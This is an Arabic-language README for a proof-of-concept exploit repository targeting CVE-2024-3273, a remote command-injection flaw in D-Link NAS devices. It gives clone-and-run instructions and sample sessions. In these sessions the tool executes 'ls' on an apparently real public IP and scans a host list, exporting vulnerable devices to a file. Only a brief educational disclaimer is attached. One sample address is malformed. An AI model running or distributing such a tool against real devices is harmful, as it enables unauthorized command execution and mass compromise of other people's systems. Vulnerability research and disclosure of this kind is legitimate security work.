
استغلال لـ CVE-2024-3273، يدعم المضيفين الفرديين والمتعددين
يحتوي هذا المستودع على إثبات المفهوم (PoC) لـ CVE-2024-3273، وهي ثغرة أمنية تم اكتشافها في أجهزة D-Link NAS. تسمح الثغرة للمهاجمين بتنفيذ أوامر عشوائية على الأجهزة المعرضة للخطر.
CVE-2024-3273 هي ثغرة في أجهزة D-Link NAS تسمح للمهاجمين عن بُعد بتنفيذ أوامر عشوائية عبر طلب HTTP مصمم خصيصًا إلى نقطة النهاية cgi-bin/nas_sharing.cgi.
يوضح إثبات المفهوم هذا كيف يمكن استغلال الثغرة لتنفيذ أوامر على أجهزة D-Link NAS المعرضة للخطر.
requestsاستنساخ هذا المستودع:
git clone https://github.com/adhikara13/CVE-2024-3273.git
الانتقال إلى دليل المستودع:
cd CVE-2024-3273
تشغيل إثبات المفهوم:
python main.py
اتباع التعليمات على الشاشة لاختيار الجهاز الهدف:
host:port، واختر ما إذا كنت تريد تصدير المضيفين المعرضين للخطر إلى vulnerables.txt.┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
إثبات المفهوم هذا مخصص للأغراض التعليمية والبحثية فقط. استخدمه بمسؤولية وعلى الأجهزة التي لديك إذن باختبارها فقط.
المساهمات مرحب بها! إذا وجدت أي مشكلات أو تحسينات، فلا تتردد في فتح مشكلة أو إنشاء طلب سحب.